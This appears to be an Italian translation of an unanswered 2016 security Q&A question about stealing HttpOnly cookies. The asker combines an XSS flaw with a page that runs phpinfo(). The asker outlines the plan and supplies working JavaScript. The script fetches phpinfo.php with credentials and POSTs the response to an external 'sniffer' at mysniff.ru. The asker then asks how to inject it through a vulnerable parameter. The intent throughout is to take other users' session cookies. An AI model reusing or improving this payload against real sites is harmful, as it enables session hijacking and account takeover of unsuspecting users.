Usando phpinfo () per ottenere i cookie httponly?

1

phpinfo () mostra tutti i cookie, anche quelli httponly. Quindi la domanda è: come posso ricevere utenti cookis sul sito web di destinazione tramite xss con phpinfo? Il xss conterrà il codice che aprirà la pagina phpinfo in background (come un popunder) e quindi usando xhtmlRequest invierà il contenuto della pagina alla mia pagina web sniffer. La domanda è: non ho davvero molto caldo per metterlo insieme. Sto vedendo in questo modo:

  1. xss sarà containt
  2. evil.js aprirà xhtmlRequest GET per ottenere la pagina phpinfo con i dati dei cookie
  3. evil.js pubblicherà i dati sul mio sniffer

È questo il modo corretto per farlo o forse ci sono approcci più appropriati? Grazie!

UPD: ho scritto un esempio,

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {

        var body = encodeURIComponent(xhttp.responseText);
        xhttp.open("POST", 'http://mysniff.ru/t.php', true)
        xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
        xhttp.send(body)

    }
};

xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();

Funzionerà se includo questo codice come script src? O devo solo urlencode e passare a parametro vulnerabile per funzionare?

    
posta user3416803 10.04.2016 - 10:39
fonte

0 risposte

Leggi altre domande sui tag